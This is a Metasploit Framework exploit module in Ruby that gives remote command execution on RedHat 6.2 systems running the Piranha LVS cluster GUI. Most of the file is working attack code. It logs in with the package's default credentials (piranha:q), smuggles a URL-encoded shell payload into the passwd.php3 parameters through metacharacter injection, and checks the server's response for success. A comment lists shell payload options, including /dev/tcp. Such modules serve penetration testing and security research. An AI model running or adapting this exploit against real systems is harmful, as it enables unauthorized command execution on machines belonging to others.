##
# $Id: piranha_passwd_exec.rb 8497 2010-02-14 20:27:24Z patrickw $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution',
			'Description'    => %q{
				This module abuses two flaws - a metacharacter injection vulnerability in the
				HTTP management server of RedHat 6.2 systems running the Piranha
				LVS cluster service and GUI (rpm packages: piranha and piranha-gui).
				The vulnerability allows an authenticated attacker to execute arbitrary
				commands as the Apache user account (nobody) within the
				/piranha/secure/passwd.php3 script. The package installs with a default
				user and password of piranha:q which was exploited in the wild.
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 8497 $',
			'References'     =>
				[
					[ 'CVE', '2000-0322' ],
					[ 'CVE', '2000-0248' ],
					[ 'OSVDB', '1300' ],
					[ 'OSVDB', '289' ],
					[ 'BID', '1149' ],
					[ 'BID', '1148' ],
				],
			'Platform'       => ['unix'],
			'Arch'           => ARCH_CMD,
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic',
							# inetd works, but not on RH6.2 syntax wise. telnet also, but /dev/tcp not found.
							# others use single quotes which apache/bash/htpasswd escapes (\) and breaks. sigh!
						}
				},
			'Targets'        =>
				[
					[ 'Automatic (piranha-gui-0.4.12-1.i386.rpm)', { }]
				],
			'DefaultTarget' => 0))

			register_options(
				[
					Opt::RPORT(80),
					OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'piranha']),
					OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'q']),
				], self.class)
	end

	def exploit
		cmd = Rex::Text.uri_encode(payload.encoded, 'hex-normal')
		str = "/piranha/secure/passwd.php3?try1=q+;#{cmd}&try2=q+;#{cmd}&passwd=ACCEPT"
		print_status("Sending GET request with encoded command line...")
		res = send_request_raw({
				'uri' => str,
				'method' => 'GET',
				'headers' => {
					'content-type' => 'application/x-www-form-urlencoded',
					},
		}, 3)

		if (res.code == 401)
			print_error("401 Authorization Required! Our BasicAuthUser and BasicAuthPass credentials not accepted!")
		elsif (res.code == 200 and res.body =~ /The passwords you supplied match/)
			print_status("Command successfully executed (according to the server).")
		end

	end

end